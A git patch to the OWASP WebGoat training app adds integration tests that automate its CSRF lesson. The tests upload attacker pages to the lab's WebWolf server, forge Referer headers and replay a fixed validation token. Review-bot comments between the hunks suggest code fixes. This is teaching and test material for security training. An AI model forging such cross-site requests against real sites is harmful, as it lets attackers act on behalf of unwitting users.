From e932253f06ba481b3f42bc739e4a8badc771ade0 Mon Sep 17 00:00:00 2001 From: Rene Zubcevic Date: Sun, 13 Oct 2019 16:04:41 +0200 Subject: [PATCH] initial test cases added --- .../test/java/org/owasp/webgoat/CSRFTest.java | 153 ++++++++++++++++++ .../org/owasp/webgoat/IntegrationTest.java | 28 ++++ .../test/java/org/owasp/webgoat/XXETest.java | 28 ---- .../org/owasp/webgoat/csrf/CSRFGetFlag.java | 5 +- .../csrf/src/main/resources/html/CSRF.html | 2 +- 5 files changed, 185 insertions(+), 31 deletions(-) create mode 100644 webgoat-integration-tests/src/test/java/org/owasp/webgoat/CSRFTest.java diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/CSRFTest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/CSRFTest.java new file mode 100644 index 000000000..872950ec1 --- /dev/null +++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/CSRFTest.java @@ -0,0 +1,153 @@ +package org.owasp.webgoat; + +import static org.junit.Assert.assertEquals; + +import java.io.IOException; +import java.nio.file.Files; +import java.nio.file.Path; +import java.nio.file.Paths; +import java.util.HashMap; +import java.util.Map; + +import org.junit.Test; + +import io.restassured.RestAssured; +import io.restassured.http.ContentType; + +public class CSRFTest extends IntegrationTest { + + private static final String trickHTML3 = "
\n" + + "\n" + + "\n" + + "
"; + + private static final String trickHTML4 = "
\n" + + "\n" + + "\n" + + "\n" + + "\n" + + "
\n" + + ""; + + private static final String trickHTML7 = "
\n" + + "\n" + + "\n" + + "
"; + + private String webwolfFileDir; + + + @Test + public void runTests() throws IOException { + startLesson("CSRF"); + + webwolfFileDir = getWebWolfServerPath(); + + //Assignment 3 + uploadTrickHtml("csrf3.html", trickHTML3.replace("WEBGOATURL", url("/csrf/basic-get-flag"))); + checkAssignment3(callTrickHtml("csrf3.html")); + + uploadTrickHtml("csrf4.html", trickHTML4.replace("WEBGOATURL", url("/csrf/review"))); + checkAssignment4(callTrickHtml("csrf4.html")); + + uploadTrickHtml("csrf7.html", trickHTML7.replace("WEBGOATURL", url("/csrf/feedback/message"))); + //checkAssignment7(callTrickHtml("csrf7.html")); + + //checkResults("/csrf"); + + } + + private void uploadTrickHtml(String htmlName, String htmlContent) throws IOException { + + //remove any left over html + Path webWolfFilePath = Paths.get(webwolfFileDir); + if (webWolfFilePath.resolve(Paths.get(getWebgoatUser(),htmlName)).toFile().exists()) { + Files.delete(webWolfFilePath.resolve(Paths.get(getWebgoatUser(),htmlName))); + } + + //upload trick html + RestAssured.given() + .when() + .relaxedHTTPSValidation() + .cookie("WEBWOLFSESSION", getWebWolfCookie()) + .multiPart("file", htmlName, htmlContent.getBytes()) + .post(webWolfUrl("/WebWolf/fileupload")) + .then() + .extract().response().getBody().asString(); + } + + private String callTrickHtml(String htmlName) { + String result = RestAssured.given() + .when() + .relaxedHTTPSValidation() + .cookie("JSESSIONID", getWebGoatCookie()) + .cookie("WEBWOLFSESSION", getWebWolfCookie()) + .get(webWolfUrl("/files/"+getWebgoatUser()+"/"+htmlName)) + .then() + .extract().response().getBody().asString(); + result = result.substring(8+result.indexOf("action=\"")); + result = result.substring(0, result.indexOf("\"")); + + return result; + } + + private void checkAssignment3(String goatURL) { + + String flag = RestAssured.given() + .when() + .relaxedHTTPSValidation() + .cookie("JSESSIONID", getWebGoatCookie()) + .header("Referer", webWolfUrl("/files/fake.html")) + 
.post(goatURL) + .then() + .extract().path("flag").toString(); + + Map params = new HashMap<>(); + params.clear(); + params.put("confirmFlagVal", flag); + checkAssignment(url("/WebGoat/csrf/confirm-flag-1"), params, true); + } + + private void checkAssignment4(String goatURL) { + + Map params = new HashMap<>(); + params.clear(); + params.put("reviewText", "test review"); + params.put("stars", "5"); + params.put("validateReq", "2aa14227b9a13d0bede0388a7fba9aa9");//always the same token is the weakness + + boolean result = RestAssured.given() + .when() + .relaxedHTTPSValidation() + .cookie("JSESSIONID", getWebGoatCookie()) + .header("Referer", webWolfUrl("/files/fake.html")) + .formParams(params) + .post(goatURL) + .then() + .extract().path("lessonCompleted"); + assertEquals(true, result); + + } + + private void checkAssignment7(String goatURL) { + + Map params = new HashMap<>(); + params.clear(); + params.put("{\"name\":\"WebGoat\",\"email\":\"webgoat@webgoat.org\",\"content\":\"WebGoat is the best!!", "\"}"); + + String result = RestAssured.given() + .when() + .relaxedHTTPSValidation() + .cookie("JSESSIONID", getWebGoatCookie()) + .header("Referer", webWolfUrl("/files/fake.html")) + .formParams(params) + .log().all() + .contentType(ContentType.TEXT) + .post(goatURL) + .then() + .log().all() + .extract().asString(); + + } + +} diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java index 22ef1cf29..7771e86ec 100644 --- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java +++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java 
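Review bot: `callTrickHtml` assumes the uploaded page contains `action="`; when `indexOf` returns -1 the arithmetic `8 + -1` makes `substring(7)` return the tail of the body, and the failure only surfaces later as a confusing POST to a bogus URL, so check the index first, e.g. `int idx = result.indexOf("action=\""); assertTrue("no form action in " + htmlName, idx >= 0);` (`org.junit.Assert.assertTrue`). In `uploadTrickHtml`, `htmlContent.getBytes()` uses the platform charset, so `getBytes(StandardCharsets.UTF_8)` keeps the upload deterministic across JDKs, and the discarded `.asString()` could instead be `.statusCode(200)` so a rejected upload fails here rather than in the later GET. `checkAssignment7` is never called (its call in `runTests` is commented out) and asserts nothing, so either finish it or drop it until assignment 7 is covered; the generic parameters of the `Map` locals appear to have been stripped in this rendering, so I have not commented on them.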
@@ -252,5 +252,33 @@ public abstract class IntegrationTest { .extract().path("lessonCompleted"), CoreMatchers.is(expectedResult)); } + public String getWebGoatServerPath() throws IOException { + + //read path from server + String result = RestAssured.given() + .when() + .relaxedHTTPSValidation() + .cookie("JSESSIONID", getWebGoatCookie()) + .get(url("/WebGoat/xxe/tmpdir")) + .then() + .extract().response().getBody().asString(); + result = result.replace("%20", " "); + return result; + } + + public String getWebWolfServerPath() throws IOException { + + //read path from server + String result = RestAssured.given() + .when() + .relaxedHTTPSValidation() + .cookie("WEBWOLFSESSION", getWebWolfCookie()) + .get(webWolfUrl("/tmpdir")) + .then() + .extract().response().getBody().asString(); + result = result.replace("%20", " "); + return result; + } + } diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java index 8adc1f95b..4c7070de1 100644 --- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java +++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java 
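Review bot: Both new public methods declare `throws IOException` although nothing in their bodies throws it (RestAssured reports failures as unchecked exceptions), so callers must propagate a checked exception that can never be thrown; drop the clause or document why it is kept. The `result.replace("%20", " ")` only undoes one escape; if the server returns a percent-encoded path, `URLDecoder.decode(result, StandardCharsets.UTF_8.name())` handles every escape, though that should be confirmed against the `/tmpdir` handler, which is outside this patch. As these are now public members of the shared base class, a short Javadoc would help, e.g. `/** Returns the WebWolf upload directory reported by the running server, with percent-escaped spaces decoded. */` on `getWebWolfServerPath` and the analogous sentence on `getWebGoatServerPath`. The enclosing class `IntegrationTest` starts outside the hunk.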
@@ -81,33 +81,5 @@ public class XXETest extends IntegrationTest { result = result.substring(result.lastIndexOf("WebGoat 8.0 rocks... ("),result.lastIndexOf("WebGoat 8.0 rocks... (")+33); return result; } - - private String getWebGoatServerPath() throws IOException { - - //read path from server - String result = RestAssured.given() - .when() - .relaxedHTTPSValidation() - .cookie("JSESSIONID", getWebGoatCookie()) - .get(url("/WebGoat/xxe/tmpdir")) - .then() - .extract().response().getBody().asString(); - result = result.replace("%20", " "); - return result; - } - - private String getWebWolfServerPath() throws IOException { - - //read path from server - String result = RestAssured.given() - .when() - .relaxedHTTPSValidation() - .cookie("WEBWOLFSESSION", getWebWolfCookie()) - .get(webWolfUrl("/tmpdir")) - .then() - .extract().response().getBody().asString(); - result = result.replace("%20", " "); - return result; - } } diff --git a/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/CSRFGetFlag.java b/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/CSRFGetFlag.java index 89027ed7a..f063c9208 100644 --- a/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/CSRFGetFlag.java +++ b/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/CSRFGetFlag.java @@ -28,6 +28,7 @@ import org.springframework.beans.factory.annotation.Autowired; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RequestMethod; import org.springframework.web.bind.annotation.ResponseBody; +import org.springframework.web.bind.annotation.RestController; import javax.servlet.ServletException; import javax.servlet.http.HttpServletRequest; @@ -40,7 +41,7 @@ import java.util.Random; /** * Created by jason on 9/30/17. */ - +@RestController public class CSRFGetFlag { @Autowired 
@@ -48,7 +49,7 @@ public class CSRFGetFlag { @Autowired private PluginMessages pluginMessages; - @RequestMapping(produces = {"application/json"}, method = RequestMethod.POST) + @RequestMapping(path="/csrf/basic-get-flag" ,produces = {"application/json"}, method = RequestMethod.POST) @ResponseBody public Map invoke(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { diff --git a/webgoat-lessons/csrf/src/main/resources/html/CSRF.html b/webgoat-lessons/csrf/src/main/resources/html/CSRF.html index 9b9d79f02..a8119e8a6 100644 --- a/webgoat-lessons/csrf/src/main/resources/html/CSRF.html +++ b/webgoat-lessons/csrf/src/main/resources/html/CSRF.html @@ -139,7 +139,7 @@ padding: 7px; margin-top:7px; padding:5px;"> -
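Review bot: With `@RestController` now on the class (previous hunk), the `@ResponseBody` on `invoke` directly below the changed `@RequestMapping` is redundant and can be removed. The new annotation's spacing, `path="/csrf/basic-get-flag" ,produces`, puts the comma after a space; `path = "/csrf/basic-get-flag", produces = ...` matches the surrounding code. Making the class a component-scanned controller with an explicit path changes how this endpoint is registered; if it was previously exposed through another mechanism not visible here, confirm the mapping is not registered twice. The `invoke` method body continues outside the hunk.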
+